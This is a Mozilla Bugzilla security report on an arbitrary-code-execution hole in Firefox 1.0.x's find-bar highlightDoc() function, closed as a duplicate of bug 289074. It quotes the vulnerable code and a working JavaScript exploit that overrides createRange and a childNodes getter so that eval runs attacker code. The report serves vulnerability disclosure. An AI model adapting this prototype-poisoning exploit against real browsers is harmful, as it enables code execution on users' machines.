Closed
Bug 289081
Opened 20 years ago
Closed 20 years ago
security hole in highlightDoc()
Categories
(Firefox :: Security, defect)
Tracking
()
RESOLVED
DUPLICATE
of bug 289074
People
(Reporter: moz_bug_r_a4, Assigned: dveditz)
References
Details
(Whiteboard: [sg:dupe 289074])
Attachments
(1 file)
476 bytes,
text/html
|
Details |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050319
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050317 Firefox/1.0.2
Vulnerability: arbitrary code execution
Vulnerable code:
from highlightDoc() in findBar.js
win = window._content;
var doc = win.document;
var body = doc.body;
var count = body.childNodes.length;
endPt = doc.createRange();
endPt.setStart(body, count);
Exploit:
Web pages can overwrite the getter and the method, such as the following.
usage of |eval| is similar to Bug 289074
eval.setStart = eval.call;
eval.__proto__ = document.createRange();
document.createRange = function() {
return eval;
};
document.body.__defineGetter__('childNodes', function() {
return { length : MALICIOUS_CODE };
});
I have confirmed that the following testcase works in:
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050317
Firefox/1.0.2
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050404
Firefox/1.0.3
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b2) Gecko/20050404
Firefox/1.0+
Reproducible: Always
Steps to Reproduce:
Reporter | ||
Comment 1•20 years ago
|
||
Updated•20 years ago
|
Status: UNCONFIRMED → NEW
Ever confirmed: true
Updated•20 years ago
|
Flags: blocking-aviary1.0.3?
Comment 2•20 years ago
|
||
Same eval problem as reported in bug 289074.
*** This bug has been marked as a duplicate of 289074 ***
*** This bug has been marked as a duplicate of 289074 ***
Assignee | ||
Updated•20 years ago
|
Whiteboard: [sg:dupe 289074]
Updated•20 years ago
|
Flags: blocking-aviary1.0.3?
Assignee | ||
Updated•20 years ago
|
Group: security
You need to log in
before you can comment on or make changes to this bug.
Description
•